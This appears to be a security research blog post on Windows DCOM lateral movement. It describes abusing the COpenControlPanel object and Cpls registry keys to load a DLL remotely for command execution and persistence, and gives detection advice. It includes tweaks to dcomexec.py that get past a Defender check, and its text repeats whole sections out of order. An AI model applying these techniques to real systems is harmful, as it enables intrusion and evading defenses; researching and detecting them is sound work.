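; DCOM security: when these values are absent, the machine-wide defaults apply
[HKEY_CLASSES_ROOT\AppID\{11111111-2222-3333-4444-555555555555}]
"AccessPermission"=hex:01,00,...
"LaunchPermission"=hex:01,00,...
```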

Lateral movement via DCOM

After attackers compromise a host, their next objective is often to compromise additional machines. This is what we call lateral movement. One common lateral movement technique is to achieve remote command execution on a target machine. There are many ways to do this, one of which involves abusing DCOM objects.

In recent years, many DCOM objects have been discovered. This research focuses on the objects exposed by the Impacket script dcomexec.py that can be used for command execution. More specifically, three exposed objects are used: ShellWindows, ShellBrowserWindow and MMC20.

  1. ShellWindows
    ShellWindows was one of the first DCOM objects to be identified. It represents a collection of open shell windows and is hosted by explorer.exe, meaning any COM client communicates with that process.

    In Impacket's dcomexec.py, once an instance of this COM object is created on a remote machine, the script provides a semi-interactive shell.

    Each time a user enters a command, the function exposed by the COM object is called. The command output is redirected to a file, which the script retrieves via SMB and displays back to simulate a regular shell.

    Internally, the script runs this command when connecting:

    cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__17602 2>&1

    This sets the working directory to C:\ and redirects the output to the ADMIN$ share under the filename __17602. After that, the script checks whether the file exists; if it does, execution is considered successful and the output appears as if in a shell.

    When running dcomexec.py against Windows 10 and 11 using the ShellWindows object, the script hangs after confirming SMB connection initialization and printing the SMB banner. As I mentioned in my personal blog post, it appears that this DCOM object no longer has permission to write to the ADMIN$ share. A simple fix is to redirect the output to a directory the DCOM object can write to, such as the Temp folder. The Temp folder can then be accessed under the same ADMIN$ share. A small change in the code resolves the issue. For example:

    OUTPUT_FILENAME = 'Temp\\__' + str(time.time())[:5]

  2. ShellBrowserWindow
    The ShellBrowserWindow object behaves almost identically to ShellWindows and exhibits the same behavior on Windows 10. The same workaround that we used for ShellWindows applies in this case. However, on Windows 11, this object no longer works for command execution.
  3. MMC20
    The MMC20.Application COM object is the automation interface for Microsoft Management Console (MMC). It exposes methods and properties that allow MMC snap-ins to be automated.

    This object has historically worked across all Windows versions. Starting with Windows Server 2025, however, attempting to use it triggers a Defender alert, and execution is blocked.

    As shown in earlier examples, the dcomexec.py script writes the command output to a file under ADMIN$, with a filename that begins with __:

    OUTPUT_FILENAME = '__' + str(time.time())[:5]

    Defender appears to check for files written under ADMIN$ that start with __, and when it detects one, it blocks the process and alerts the user. A quick fix is to simply remove the double underscores from the output filename.

    Another way to bypass this issue is to use the same workaround used for ShellWindows – redirecting the output to the Temp folder. The table below outlines the status of these objects across different Windows versions.

    Object               Windows Server 2025    Windows Server 2022    Windows 11              Windows 10
    ShellWindows         Doesn't work           Doesn't work           Works but needs a fix   Works but needs a fix
    ShellBrowserWindow   Doesn't work           Doesn't work           Doesn't work            Works but needs a fix
    MMC20                Detected by Defender   Works                  Works                   Works
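
Both fixes described above come down to how dcomexec.py builds its output filename. The helper below is a hypothetical, self-contained sketch of that naming logic (the real script simply assigns OUTPUT_FILENAME inline):

```python
import time

def make_output_filename(redirect_to_temp=True, strip_double_underscore=True):
    """Mirror of the two dcomexec.py filename fixes described above.

    redirect_to_temp        -- prepend 'Temp\\' so the DCOM object can create the
                               file on Windows 10/11 (ShellWindows/ShellBrowserWindow
                               fix); the result stays reachable under \\target\ADMIN$\Temp.
    strip_double_underscore -- drop the '__' prefix that Defender keys on under
                               ADMIN$ (MMC20 fix on Windows Server 2025).
    """
    prefix = 'Temp\\' if redirect_to_temp else ''
    marker = '' if strip_double_underscore else '__'
    # First 5 characters of the epoch timestamp, as in the original script
    return prefix + marker + str(time.time())[:5]

print(make_output_filename())  # a Temp\17602-style name
```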

Enumerating COM/DCOM objects

The first step to identifying which DCOM objects could be used for lateral movement is to enumerate them. By enumerating, I don't just mean listing the objects. Enumeration involves:

  • Finding objects and filtering specifically for DCOM objects.
  • Identifying their interfaces.
  • Inspecting the exposed functions.
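
To illustrate the filtering step portably, the sketch below runs the same logic over a mocked HKEY_CLASSES_ROOT\CLSID snapshot (the GUIDs and paths are invented; on a real system you would enumerate these keys with Python's winreg module): any class carrying an AppID subkey is a DCOM candidate, and a TypeLib subkey signals that its interfaces are documented and easier to inspect.

```python
# Mocked HKCR\CLSID snapshot (GUIDs and paths are invented for illustration).
clsid_snapshot = {
    '{11111111-0000-0000-0000-000000000001}': {
        'LocalServer32': r'C:\Windows\System32\example1.exe',
        'AppID': '{11111111-0000-0000-0000-000000000001}',     # DCOM-capable
    },
    '{11111111-0000-0000-0000-000000000002}': {
        'InprocServer32': r'C:\Windows\System32\example2.dll',  # plain in-proc COM
    },
    '{11111111-0000-0000-0000-000000000003}': {
        'LocalServer32': r'C:\Windows\System32\example3.exe',
        'AppID': '{11111111-0000-0000-0000-000000000003}',      # DCOM-capable
        'TypeLib': '{22222222-0000-0000-0000-000000000003}',    # documented
    },
}

def dcom_candidates(snapshot):
    """Yield (clsid, has_typelib) for classes that can be reached over DCOM.

    A class with an AppID subkey can be extended to DCOM; a TypeLib subkey
    means its interfaces and functions can be inspected without reversing.
    """
    for clsid, subkeys in snapshot.items():
        if 'AppID' in subkeys:
            yield clsid, 'TypeLib' in subkeys

candidates = dict(dcom_candidates(clsid_snapshot))
# Two DCOM candidates here; only the third class also ships a TypeLib.
```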

Automating enumeration is difficult because most COM objects lack a type library (TypeLib). A TypeLib acts as documentation for an object: which interfaces it supports, which functions are exposed, and the definitions of those functions. Even when TypeLibs are available, manual inspection is often still required, as we will explain later.

There are several approaches to enumerating COM objects depending on their use cases. Next, we'll describe the methods I used while conducting this research, both automated and manual.

  1. Automation using PowerShell
    In PowerShell, you can use .NET to create and interact with DCOM objects. Objects can be created using either their ProgID or CLSID, after which you can call their functions (as shown in the figure below).
    Shell.Application COM object function list in PowerShell


    Under the hood, PowerShell checks whether the COM object has a TypeLib and implements the IDispatch interface. IDispatch enables late binding, which allows runtime dynamic object creation and function invocation. With these two conditions met, PowerShell can dynamically interact with COM objects at runtime.

    Our strategy looks like this: create the COM object in PowerShell, list the functions it exposes, then manually inspect the results.

    In the final step, we perform manual inspection to look for functions with names that could be of interest, such as Execute, Exec, Shell, etc. These names often indicate potential command execution capabilities.

    However, this approach has several limitations:

    • TypeLib requirement: Not all COM objects have a TypeLib, so many objects cannot be enumerated this way.
    • IDispatch requirement: Not all COM objects implement the IDispatch interface, which is required for PowerShell interaction.
    • Interface control: When you instantiate an object in PowerShell, you cannot choose which interface the instance will be tied to. If a COM class implements multiple interfaces, PowerShell will automatically select the one marked as [default] in the TypeLib. This means that other non-default interfaces, which may contain additional relevant functionality, such as command execution, could be overlooked.
  2. Automation using C++
    As you might expect, C++ is one of the languages that natively supports COM clients. Using C++, you can create instances of COM objects and call their functions via header files that define the interfaces. However, with this approach, we are not necessarily interested in calling functions directly. Instead, the goal is to check whether a specific COM object supports certain interfaces. The reasoning is that many interfaces have been found to contain functions that can be abused for command execution or other purposes.

    This strategy primarily relies on an interface called IUnknown. All COM interfaces should inherit from this interface, and all COM classes should implement it. The IUnknown interface exposes three main functions. The most important is QueryInterface(), which is used to ask a COM object for a pointer to one of its interfaces. So, the strategy is to:

    • Enumerate COM classes in the system by reading CLSIDs under the HKEY_CLASSES_ROOT\CLSID key.
    • Check whether they support any known valuable interfaces. If they do, those classes may be leveraged for command execution or other useful functionality.

    This method has several advantages:

    • No TypeLib dependency: Unlike PowerShell, this approach does not require the COM object to have a TypeLib.
    • Use of IUnknown: In C++, you can use the QueryInterface function from the base IUnknown interface to check if a particular interface is supported by a COM class.
    • No need for interface definitions: Even without knowing the exact interface structure, you can obtain a pointer to its virtual function table (vtable), typically cast as a void*. This is enough to confirm the existence of the interface and potentially inspect it further.

    The figure below illustrates this strategy:

    This approach is good in terms of automation because it eliminates the need for manual inspection. However, we are still only checking well-known interfaces commonly used for lateral movement, while potentially missing others.

  3. Manual inspection using open-source tools

    As you can see, automation can be difficult since it requires several prerequisites and, in many cases, still ends with a manual inspection. An alternative approach is manual inspection using a tool called OleViewDotNet, developed by James Forshaw. This tool allows you to:
    • List all COM classes in the system.
    • Create instances of those classes.
    • Check their supported interfaces.
    • Call specific functions.
    • Apply various filters for easier analysis.
    • Perform other inspection tasks.
    Open-source tool for inspecting COM interfaces


    One of the most valuable features of this tool is its naming visibility. OleViewDotNet extracts the names of interfaces and classes (when available) from the Windows Registry and displays them, along with any associated type libraries.

    This makes manual inspection easier, since you can analyze the names of classes, interfaces, or type libraries and correlate them with potentially interesting functionality, for example, functions that could lead to command execution or persistence techniques.

Control Panel items as attack surfaces

Control Panel items allow users to view and adjust their computer settings. These items are implemented as DLLs that export the CPlApplet function and typically have the .cpl extension. Control Panel items can also be executables, but our research will focus on DLLs only.

Control Panel items


Attackers can abuse CPL files for initial access. When a user executes a malicious .cpl file (e.g., delivered via phishing), the system may be compromised – a technique mapped to MITRE ATT&CK T1218.002.

Adversaries may also modify the extensions of malicious DLLs to .cpl and register them in the corresponding locations in the registry.

  • Under HKEY_CURRENT_USER:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • Under HKEY_LOCAL_MACHINE:
    • For 64-bit DLLs:
      HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
    • For 32-bit DLLs:
      HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

These locations are important when Control Panel DLLs need to be available to the current logged-in user or to all users on the machine. However, the "Control Panel" subkey and its "Cpls" subkey under HKCU must be created manually, unlike the "Control Panel" and "Cpls" subkeys under HKLM, which are created automatically by the operating system.

Once registered, the DLL (CPL file) will load every time the Control Panel is opened, enabling persistence on the victimโ€™s system.
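
For illustration, a registration under the HKCU location could look like this in .reg export form (the value name is arbitrary and the DLL path is invented):

```
Windows Registry Editor Version 5.00

; Value name is arbitrary; value data is the path to the registered CPL/DLL
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls]
"ExampleApplet"="C:\\Users\\Public\\example.cpl"
```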

It's worth noting that even DLLs that do not comply with the CPL specification, do not export CPlApplet, or do not have the .cpl extension can still be executed via their DllEntryPoint function if they are registered under the registry keys listed above.

There are multiple ways to execute Control Panel items:

  • From cmd: control.exe [filename].cpl
  • By double-clicking the .cpl file.

Both methods use rundll32.exe under the hood:

rundll32.exe shell32.dll,Control_RunDLL [filename].cpl

This calls the Control_RunDLL function from shell32.dll, passing the CPL file as an argument. Everything inside the CPlApplet function will then be executed.

However, if the CPL file has been registered in the registry as shown earlier, then every time the Control Panel is opened, the file is loaded into memory through the COM Surrogate process (dllhost.exe):

COM Surrogate process loading the CPL file


What happened here is that the Control Panel, acting as a COM client, used a COM object to load these CPL files. We will talk about this COM object in more detail later.

The COM Surrogate process was designed to host COM server DLLs in a separate process rather than loading them directly into the client processโ€™s address space. This isolation improves stability for the in-process server model. This hosting behavior can be configured for a COM object in the registry if you want a COM server DLL to run inside a separate process because, by default, it is loaded in the same process.

'DCOMing' through Control Panel items

While following the manual approach of enumerating COM/DCOM objects that could be useful for lateral movement, I came across a COM object called COpenControlPanel, which is exposed through shell32.dll and has the CLSID {06622D85-6856-4460-8DE1-A81921B41C4B}. This object exposes multiple interfaces, one of which is IOpenControlPanel with IID {D11AD862-66DE-4DF4-BF6C-1F5621996AF1}.

IOpenControlPanel interface in the OleViewDotNet output


I immediately thought of its potential to compromise Control Panel items, so I wanted to check which functions were exposed by this interface. Unfortunately, neither the interface nor the COM class has a type library.

COpenControlPanel interfaces without TypeLib


Normally, checking the interface definition would require reverse engineering, so at first, it looked like we needed to take a different research path. However, it turned out that the IOpenControlPanel interface is documented on MSDN, and according to the documentation, it exposes several functions. One of them, called Open, allows a specified Control Panel item to be opened using its name as the first argument.

Full type and function definitions are provided in the shobjidl_core.h Windows header file.

Open function exposed by IOpenControlPanel interface


It's worth noting that in newer versions of Windows (e.g., Windows Server 2025 and Windows 11), Microsoft has removed interface names from the registry, which means they can no longer be identified through OleViewDotNet.

COpenControlPanel interfaces without names


Returning to the COpenControlPanel COM object, I found that the Open function can trigger a DLL to be loaded into memory if it has been registered in the registry. For the purposes of this research, I created a DLL whose DllEntryPoint simply spawns a message box. I registered it under HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls and then created a simple C++ COM client to call the Open function on this interface.

As expected, the DLL was loaded into memory. It was hosted in the same way that it would be if the Control Panel itself was opened: through the COM Surrogate process (dllhost.exe). Using Process Explorer, it was clear that dllhost.exe loaded my DLL while simultaneously hosting the COpenControlPanel object along with other COM objects.

COM Surrogate loading a custom DLL and hosting the COpenControlPanel object


Based on my testing, I made the following observations:

  1. The DLL that needs to be registered does not necessarily have to be a .cpl file; any DLL with a valid entry point will be loaded.
  2. The Open() function accepts the name of a Control Panel item as its first argument. However, it appears that even if a random string is supplied, it still causes all DLLs registered in the relevant registry location to be loaded into memory.

Now, what if we could trigger this COM object remotely? In other words, what if it is not just a COM object but also a DCOM object? To verify this, we checked the AppID of the COpenControlPanel object using OleViewDotNet.

COpenControlPanel object in OleViewDotNet


Both the launch and access permissions are empty, which means the object will follow the systemโ€™s default DCOM security policy. By default, members of the Administrators group are allowed to launch and access the DCOM object.

Based on this, we can build a remote strategy. First, upload the "malicious" DLL, then use the Remote Registry service to register it in the appropriate registry location. Finally, use a trigger acting as a DCOM client to remotely invoke the Open() function, causing our DLL to be loaded. The diagram below illustrates the flow of this approach.

Malicious DLL loading using DCOM


The trigger can be written in either C++ or Python, for example, using Impacket. I chose Python because of its flexibility. The trigger itself is straightforward: we define the DCOM class, the interface, and the function to call. The full code example can be found here.

Once the trigger runs, the behavior will be the same as when executing the COM client locally: our DLL will be loaded through the COM Surrogate process (dllhost.exe).

As you can see, this technique not only achieves command execution but also provides persistence. It can be triggered in two ways: when a user opens the Control Panel or remotely at any time via DCOM.

Detection

The first step in detecting such activity is to check whether any Control Panel items have been registered under the following registry paths:

  • HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

Although commonly known best practices and research papers regarding Windows security advise monitoring only the first subkey, for thorough coverage it is important to monitor all of the above.

In addition, monitoring dllhost.exe (COM Surrogate) for unusual COM objects such as COpenControlPanel can provide indicators of malicious activity.
Finally, it is always recommended to monitor Remote Registry usage because it is commonly abused in many types of attacks, not just in this scenario.

Conclusion

In conclusion, I hope this research has clarified yet another attack vector and emphasized the importance of implementing hardening practices. Below are a few closing points for security researchers to take into account:

  • As shown, DCOM represents a large attack surface. Windows exposes many DCOM classes, a significant number of which lack type libraries โ€“ meaning reverse engineering can reveal additional classes that may be abused for lateral movement.
  • Changing registry values to register malicious CPLs is not good practice from a red teaming ethics perspective. Defender products tend to monitor common persistence paths, but Control Panel applets can be registered in multiple registry locations, so there is always a gap that can be exploited.
  • Bitness also matters. On x64 systems, loading a 32-bit DLL will spawn a 32-bit COM Surrogate process (dllhost.exe *32). This is unusual on 64-bit hosts and therefore serves as a useful detection signal for defenders and an interesting red flag for red teamers to consider.

Yet another DCOM object for lateral movement

19 December 2025 at 09:00

Introduction

If youโ€™re a penetration tester, you know that lateral movement is becoming increasingly difficult, especially in well-defended environments. One common technique for remote command execution has been the use of DCOM objects.

Over the years, many different DCOM objects have been discovered. Some rely on native Windows components, others depend on third-party software such as Microsoft Office, and some are undocumented objects found through reverse engineering. While certain objects still work, others no longer function in newer versions of Windows.

This research presents a previously undescribed DCOM object that can be used for both command execution and potential persistence. This new technique abuses older initial access and persistence methods through Control Panel items.

First, we will discuss COM technology. After that, we will review the current state of the Impacket dcomexec script, focusing on objects that still function, and discuss potential fixes and improvements, then move on to techniques for enumerating objects on the system. Next, we will examine Control Panel items, how adversaries have used them for initial access and persistence, and how these items can be leveraged through a DCOM object to achieve command execution.

Finally, we will cover detection strategies to identify and respond to this type of activity.

COM/DCOM technology

What is COM?

COM stands for Component Object Model, a Microsoft technology that defines a binary standard for interoperability. It enables the creation of reusable software components that can interact at runtime without the need to compile COM libraries directly into an application.

These software components operate in a clientโ€“server model. A COM object exposes its functionality through one or more interfaces. An interface is essentially a collection of related member functions (methods).

COM also enables communication between processes running on the same machine by using local RPC (Remote Procedure Call) to handle cross-process communication.

Terms

To ensure a better understanding of its structure and functionality, let's review the key COM-related terms.

  1. COM interface
    A COM interface defines the functionality that a COM object exposes. Each COM interface is identified by a unique GUID known as the IID (Interface ID). All COM interfaces can be found in the Windows Registry under HKEY_CLASSES_ROOT\Interface, where they are organized by GUID.
  2. COM class (COM CoClass)
    A COM class is the actual implementation of one or more COM interfaces. Like COM interfaces, classes are identified by unique GUIDs, but in this case the GUID is called the CLSID (Class ID). This GUID is used to locate the COM server and activate the corresponding COM class.

    All COM classes must be registered in the registry under HKEY_CLASSES_ROOT\CLSID, where each classโ€™s GUID is stored. Under each GUID, you may find multiple subkeys that serve different purposes, such as:

    • InprocServer32/LocalServer32: Specifies the system path of the COM server where the class is defined. InprocServer32 is used for in-process servers (DLLs), while LocalServer32 is used for out-of-process servers (EXEs). Weโ€™ll describe this in more detail later.
    • ProgID: A human-readable name assigned to the COM class.
    • TypeLib: A binary description of the COM class (essentially documentation for the class).
    • AppID: Used to describe security configuration for the class.
  3. COM server
    A COM server is the module where a COM class is defined. The server can be implemented as an EXE, in which case it is called an out-of-process server, or as a DLL, in which case it is called an in-process server. Each COM server has a unique file path or location in the system. Information about COM servers is stored in the Windows Registry, which the COM runtime uses to locate the server and perform further actions. Registry entries for COM servers are located under the HKEY_CLASSES_ROOT root key for both 32- and 64-bit servers.
Component Object Model implementation

Clientโ€“server model

  1. In-process server
    In the case of an in-process server, the server is implemented as a DLL. The client loads this DLL into its own address space and directly executes functions exposed by the COM object. This approach is efficient since both client and server run within the same process.
    In-process COM server

  2. Out-of-process server
    Here, the server is implemented and compiled as an executable (EXE). Since the client cannot load an EXE into its address space, the server runs in its own process, separate from the client. Communication between the two processes is handled via ALPC (Advanced Local Procedure Call) ports, which serve as the RPC transport layer for COM.
Out-of-process COM server

What is DCOM?

DCOM is an extension of COM where the D stands for Distributed. It enables the client and server to reside on different machines. From the userโ€™s perspective, there is no difference: DCOM provides an abstraction layer that makes both the client and the server appear as if they are on the same machine.

Under the hood, however, DCOM uses TCP as the RPC transport layer to enable communication across machines.

Distributed COM implementation

Certain requirements must be met to extend a COM object into a DCOM object. The most important one for our research is the presence of the AppID subkey in the registry, located under the COM CLSID entry.

The AppID value contains a GUID that maps to a corresponding key under HKEY_CLASSES_ROOT\AppID. Several subkeys may exist under this GUID. Two critical ones are:

  • AccessPermission: controls access permissions.
  • LaunchPermission: controls activation permissions.

These registry settings grant remote clients permissions to activate and interact with DCOM objects.

Lateral movement via DCOM

After attackers compromise a host, their next objective is often to compromise additional machines. This is what we call lateral movement. One common lateral movement technique is to achieve remote command execution on a target machine. There are many ways to do this, one of which involves abusing DCOM objects.

In recent years, many DCOM objects have been discovered. This research focuses on the objects exposed by the Impacket script dcomexec.py that can be used for command execution. More specifically, three exposed objects are used: ShellWindows, ShellBrowserWindow and MMC20.

  1. ShellWindows
    ShellWindows was one of the first DCOM objects to be identified. It represents a collection of open shell windows and is hosted by explorer.exe, meaning any COM client communicates with that process.

    In Impacketโ€™s dcomexec.py, once an instance of this COM object is created on a remote machine, the script provides a semi-interactive shell.

    Each time a user enters a command, the function exposed by the COM object is called. The command output is redirected to a file, which the script retrieves via SMB and displays back to simulate a regular shell.

    Internally, the script runs this command when connecting:

    cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__17602 2>&1

    This sets the working directory to C:\ and redirects the output to the ADMIN$ share under the filename __17602. After that, the script checks whether the file exists; if it does, execution is considered successful and the output appears as if in a shell.

    When running dcomexec.py against Windows 10 and 11 using the ShellWindows object, the script hangs after confirming SMB connection initialization and printing the SMB banner. As I mentioned in my personal blog post, it appears that this DCOM object no longer has permission to write to the ADMIN$ share. A simple fix is to redirect the output to a directory the DCOM object can write to, such as the Temp folder. The Temp folder can then be accessed under the same ADMIN$ share. A small change in the code resolves the issue. For example:

    OUTPUT_FILENAME = 'Temp\\__' + str(time.time())[:5]

  2. ShellBrowserWindow
    The ShellBrowserWindow object behaves almost identically to ShellWindows and exhibits the same behavior on Windows 10. The same workaround that we used for ShellWindows applies in this case. However, on Windows 11, this object no longer works for command execution.
  3. MMC20
    The MMC20.Application COM object is the automation interface for Microsoft Management Console (MMC). It exposes methods and properties that allow MMC snap-ins to be automated.

    This object has historically worked across all Windows versions. Starting with Windows Server 2025, however, attempting to use it triggers a Defender alert, and execution is blocked.

    As shown in earlier examples, the dcomexec.py script writes the command output to a file under ADMIN$, with a filename that begins with __:

    OUTPUT_FILENAME = '__' + str(time.time())[:5]

    Defender appears to check for files written under ADMIN$ that start with __, and when it detects one, it blocks the process and alerts the user. A quick fix is to simply remove the double underscores from the output filename.

    Another way to bypass this issue is to use the same workaround used for ShellWindows โ€“ redirecting the output to the Temp folder. The table below outlines the status of these objects across different Windows versions.

    Object               Windows Server 2025    Windows Server 2022    Windows 11              Windows 10
    ShellWindows         Doesn't work           Doesn't work           Works but needs a fix   Works but needs a fix
    ShellBrowserWindow   Doesn't work           Doesn't work           Doesn't work            Works but needs a fix
    MMC20                Detected by Defender   Works                  Works                   Works
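Taken together, the ShellWindows and MMC20 workarounds boil down to small changes in how dcomexec.py names its output file. The sketch below is a minimal illustration of that renaming logic; the function name and flags are mine for illustration, not Impacket's actual code:

```python
import time

def output_path(use_temp_fix: bool, strip_underscores: bool = False) -> str:
    """Build a dcomexec-style output file path under the ADMIN$ share.

    use_temp_fix:      redirect output into the Temp folder, which the DCOM
                       object can still write to (ShellWindows fix)
    strip_underscores: drop the '__' prefix that Defender keys on (MMC20 fix)
    """
    prefix = "" if strip_underscores else "__"
    name = prefix + str(time.time())[:5]      # e.g. '__17602', as in the script
    if use_temp_fix:
        name = "Temp\\" + name
    return "\\\\127.0.0.1\\ADMIN$\\" + name
```

Both fixes compose: redirecting into Temp while also dropping the underscores sidesteps the write-permission failure and the Defender filename check at the same time.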

Enumerating COM/DCOM objects

The first step to identifying which DCOM objects could be used for lateral movement is to enumerate them. By enumerating, I donโ€™t just mean listing the objects. Enumeration involves:

  • Finding objects and filtering specifically for DCOM objects.
  • Identifying their interfaces.
  • Inspecting the exposed functions.

Automating enumeration is difficult because most COM objects lack a type library (TypeLib). A TypeLib acts as documentation for an object: which interfaces it supports, which functions are exposed, and the definitions of those functions. Even when TypeLibs are available, manual inspection is often still required, as we will explain later.

There are several approaches to enumerating COM objects depending on their use cases. Next, weโ€™ll describe the methods I used while conducting this research, taking into account both automated and manual methods.

  1. Automation using PowerShell
    In PowerShell, you can use .NET to create and interact with DCOM objects. Objects can be created using either their ProgID or CLSID, after which you can call their functions (as shown in the figure below).
    Shell.Application COM object function list in PowerShell

    Under the hood, PowerShell checks whether the COM object has a TypeLib and implements the IDispatch interface. IDispatch enables late binding, which allows runtime dynamic object creation and function invocation. With these two conditions met, PowerShell can dynamically interact with COM objects at runtime.

    Our strategy looks like this: enumerate COM objects that have a TypeLib and implement IDispatch, instantiate each one in PowerShell, list its exposed functions, and finally inspect the results manually.

    In that final manual step, we look for functions with names that could be of interest, such as Execute, Exec, Shell, etc. These names often indicate potential command execution capabilities.

    However, this approach has several limitations:

    • TypeLib requirement: Not all COM objects have a TypeLib, so many objects cannot be enumerated this way.
    • IDispatch requirement: Not all COM objects implement the IDispatch interface, which is required for PowerShell interaction.
    • Interface control: When you instantiate an object in PowerShell, you cannot choose which interface the instance will be tied to. If a COM class implements multiple interfaces, PowerShell will automatically select the one marked as [default] in the TypeLib. This means that other non-default interfaces, which may contain additional relevant functionality, such as command execution, could be overlooked.
  2. Automation using C++
    As you might expect, C++ is one of the languages that natively supports COM clients. Using C++, you can create instances of COM objects and call their functions via header files that define the interfaces. However, with this approach, we are not necessarily interested in calling functions directly. Instead, the goal is to check whether a specific COM object supports certain interfaces. The reasoning is that many interfaces have been found to contain functions that can be abused for command execution or other purposes.

    This strategy primarily relies on an interface called IUnknown. All COM interfaces should inherit from this interface, and all COM classes should implement it. The IUnknown interface exposes three main functions, the most important being QueryInterface(), which is used to ask a COM object for a pointer to one of its interfaces. So, the strategy is to:

    • Enumerate COM classes in the system by reading CLSIDs under the HKEY_CLASSES_ROOT\CLSID key.
    • Check whether they support any known valuable interfaces. If they do, those classes may be leveraged for command execution or other useful functionality.

    This method has several advantages:

    • No TypeLib dependency: Unlike PowerShell, this approach does not require the COM object to have a TypeLib.
    • Use of IUnknown: In C++, you can use the QueryInterface function from the base IUnknown interface to check if a particular interface is supported by a COM class.
    • No need for interface definitions: Even without knowing the exact interface structure, you can obtain a pointer to its virtual function table (vtable), typically cast as a void*. This is enough to confirm the existence of the interface and potentially inspect it further.

    The figure below illustrates this strategy:

    This approach is good in terms of automation because it eliminates the need for manual inspection. However, we are still only checking well-known interfaces commonly used for lateral movement, while potentially missing others.

  3. Manual inspection using open-source tools

    As you can see, automation can be difficult since it requires several prerequisites and, in many cases, still ends with a manual inspection. An alternative approach is manual inspection using a tool called OleViewDotNet, developed by James Forshaw. This tool allows you to:
    • List all COM classes in the system.
    • Create instances of those classes.
    • Check their supported interfaces.
    • Call specific functions.
    • Apply various filters for easier analysis.
    • Perform other inspection tasks.
    Open-source tool for inspecting COM interfaces

    One of the most valuable features of this tool is its naming visibility. OleViewDotNet extracts the names of interfaces and classes (when available) from the Windows Registry and displays them, along with any associated type libraries.

    This makes manual inspection easier, since you can analyze the names of classes, interfaces, or type libraries and correlate them with potentially interesting functionality, for example, functions that could lead to command execution or persistence techniques.
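Abstracting away from the specific tooling, the triage that all three approaches converge on can be sketched in a few lines. The registry snapshot below is fabricated for illustration (real data would come from HKEY_CLASSES_ROOT\CLSID, e.g. via winreg or OleViewDotNet exports), and the AppID value shown is illustrative; the function names under COpenControlPanel are the ones IOpenControlPanel documents.

```python
# Offline sketch of the triage logic: on Windows the class data would come
# from HKEY_CLASSES_ROOT\CLSID; here a plain dict stands in for the registry.
INTERESTING = ("execute", "exec", "shell", "open", "run", "navigate")

def triage(classes: dict) -> dict:
    """Return DCOM candidates (classes with an AppID) whose exposed
    function names suggest command execution or file/DLL loading."""
    hits = {}
    for clsid, info in classes.items():
        if info.get("AppID") is None:
            continue  # plain COM object: no AppID means no remote activation
        flagged = [f for f in info.get("functions", [])
                   if any(k in f.lower() for k in INTERESTING)]
        if flagged:
            hits[clsid] = flagged
    return hits

sample = {
    "{06622D85-6856-4460-8DE1-A81921B41C4B}": {   # COpenControlPanel
        "AppID": "{06622D85-6856-4460-8DE1-A81921B41C4B}",  # illustrative value
        "functions": ["Open", "GetPath", "GetCurrentView"],
    },
    "{00000000-0000-0000-0000-000000000001}": {   # in-process only, no AppID
        "AppID": None,
        "functions": ["Execute"],
    },
}
```

Running triage(sample) surfaces only COpenControlPanel, flagged on its Open function: the second class exposes Execute but has no AppID, so it cannot be activated remotely.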

Control Panel items as attack surfaces

Control Panel items allow users to view and adjust their computer settings. These items are implemented as DLLs that export the CPlApplet function and typically have the .cpl extension. Control Panel items can also be executables, but our research will focus on DLLs only.

Control Panel items

Attackers can abuse CPL files for initial access. When a user executes a malicious .cpl file (e.g., delivered via phishing), the system may be compromised โ€“ a technique mapped to MITRE ATT&CK T1218.002.

Adversaries may also modify the extensions of malicious DLLs to .cpl and register them in the corresponding locations in the registry.

  • Under HKEY_CURRENT_USER:
    HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
  • Under HKEY_LOCAL_MACHINE:
    • For 64-bit DLLs:
      HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls
    • For 32-bit DLLs:
      HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls

These locations are important when Control Panel DLLs need to be available to the current logged-in user or to all users on the machine. However, the โ€œControl Panelโ€ subkey and its โ€œCplsโ€ subkey under HKCU should be created manually, unlike the โ€œControl Panelโ€ and โ€œCplsโ€ subkeys under HKLM, which are created automatically by the operating system.

Once registered, the DLL (CPL file) will load every time the Control Panel is opened, enabling persistence on the victimโ€™s system.

Itโ€™s worth noting that even DLLs that do not comply with the CPL specification, do not export CPlApplet, or do not have the .cpl extension can still be executed via their DllEntryPoint function if they are registered under the registry keys listed above.
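For reference, the scope and bitness rules above can be captured in a tiny helper. This is a convenience function of mine, not a Windows API:

```python
def cpls_key(scope: str = "machine", dll_bits: int = 64) -> str:
    """Return the registry path where a Control Panel DLL must be
    registered so that it loads when the Control Panel is opened."""
    if scope == "user":
        # Note: 'Control Panel\Cpls' does not exist under HKCU by default
        # and has to be created manually.
        return r"HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
    if dll_bits == 32:
        # 32-bit DLLs on a 64-bit system go under the WOW6432Node view.
        return r"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
    return r"HKLM\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls"
```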

There are multiple ways to execute Control Panel items:

  • From cmd: control.exe [filename].cpl
  • By double-clicking the .cpl file.

Both methods use rundll32.exe under the hood:

rundll32.exe shell32.dll,Control_RunDLL [filename].cpl

This calls the Control_RunDLL function from shell32.dll, passing the CPL file as an argument. Everything inside the CPlApplet function will then be executed.

However, if the CPL file has been registered in the registry as shown earlier, then every time the Control Panel is opened, the file is loaded into memory through the COM Surrogate process (dllhost.exe):

COM Surrogate process loading the CPL file

What happens here is that the Control Panel itself acts as a COM client and uses a COM object to load these CPL files. We will talk about this COM object in more detail later.

